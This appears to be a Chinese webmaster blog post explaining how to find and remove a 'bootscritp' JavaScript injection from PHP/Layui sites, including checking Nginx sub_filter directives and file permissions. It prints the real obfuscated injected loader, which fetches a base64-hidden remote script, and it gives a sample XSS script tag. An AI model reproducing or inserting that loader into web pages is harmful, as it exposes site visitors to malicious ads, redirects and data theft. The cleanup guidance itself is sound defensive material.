如果你近期打开网站首页时,突然弹出包含违规广告、XX 图片的弹窗,不用慌张 —— 这很可能是网站遭遇了bootscritp 恶意代码注入。作为长期维护 PHP 网站的从业者,我曾亲身经历过类似攻击,尤其多数 PHP 网站依赖 Layui 框架构建,这类注入问题更具普遍性。本文将从问题定位、应急处理到永久防护,手把手教新手站长解决问题,帮你快速恢复网站正常运营。
一、先搞懂:为什么你的网站会被注入?
在动手解决前,先明确攻击的核心逻辑,才能避免后续重复踩坑。bootscritp 恶意注入本质是黑客利用网站代码漏洞,将恶意 JavaScript 代码植入服务器文件或数据库,当用户访问页面时,代码被加载执行,从而弹出违规弹窗、跳转恶意链接,甚至窃取用户数据。
对 PHP+Layui 网站而言,常见的漏洞点主要有 3 个:
1.输入验证缺失:比如网站的搜索框、留言板、用户登录等功能,未对用户输入的内容做过滤,黑客可通过输入特殊格式的代码(如<script src=”恶意链接”></script>)注入到数据库或页面中;
2.Layui 框架使用不规范:部分站长直接使用未经验证的 Layui 插件、模板,或未及时更新框架版本(旧版本存在 XSS 漏洞),给黑客留下可乘之机;
3.服务器权限过高:网站文件(尤其是index.php、config.php等核心文件)设置了过高权限(如 777),黑客一旦通过漏洞进入,可直接修改文件内容。
二、服务器中所有站点都被注入,解决指南。
1.首先检查 /etc/nginx/nginx.conf 以及 sites-enabled/ 目录下的所有配置文件,查看是否有 sub_filter、subs_filter 指令。
2.如果上面的文件不存在,那么再检查 /www/server/nginx/conf/nginx.conf 文件,是否有如下代码。
document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})()使用在线base64解码/编码工具得到如下结果,
3.如果存在以上代码,直接到宝塔软件管理中卸载Nginx插件,卸载完成后重新安装Nginx插件即可。
三、某单个站点被注入,解决指南。
1.到站点目录中使用 代码编辑器 搜索查询上面的代码内容,或者按照 标签标识 去搜索查询,找到代码位置移除即可。
2.检查网站程序代码文件是否存在远程调用的Js代码,有些远程的JS年久失修很有可能存在漏洞。
3.如果你发现文件中存在太多类似的代码,建议你服务器和网站重新安装吧。
四、常见问题:新手容易踩的坑
1.删除恶意代码后,过几天又出现?
原因:漏洞未修复,黑客通过同一漏洞再次注入。解决:回到 “步骤三”,重点检查用户输入过滤和文件权限,确保漏洞已堵住。
2.替换 Layui 原版文件后,网站样式错乱?
原因:使用的 Layui 版本与网站代码不兼容。解决:查看网站原 Layui 版本(在layui.js开头可看到版本号,如v2.6.8),从官网下载对应版本覆盖,不要直接升级到最新版(若网站代码依赖旧版本功能)。
3.找不到恶意代码在哪个文件?
原因:恶意代码可能藏在公共引用文件中。解决:用 “文件搜索工具”(如 Notepad++ 的 “在文件中搜索” 功能),在网站根目录下搜索恶意代码中的关键词(如 “违规广告的文字内容”“恶意域名”),快速定位文件。
如果按以上步骤操作后,问题仍未解决,建议联系服务器提供商(如阿里云、腾讯云)的技术支持,或找专业的网站安全人员协助审计 —— 早期解决漏洞的成本,远低于后期网站被处罚、用户流失的损失。记住:网站安全没有 “一劳永逸”,定期维护和防护才是关键!
说明: 本站源码压缩包如果有密码,统一解压密码:www.rclou.cn
须知: 分享目的仅供个人学习和参考,请勿用于商业用途,否则后果自负。若有侵权,请联系我们删除文章。请致信邮箱:rcloucn@163.com
声明: 本站部分文章和资源,均来源于网络收集分享,其版权归属于该程序代码的合法者拥有。如若本站内容侵犯了原著者的合法权益,可联系我们即时处理。
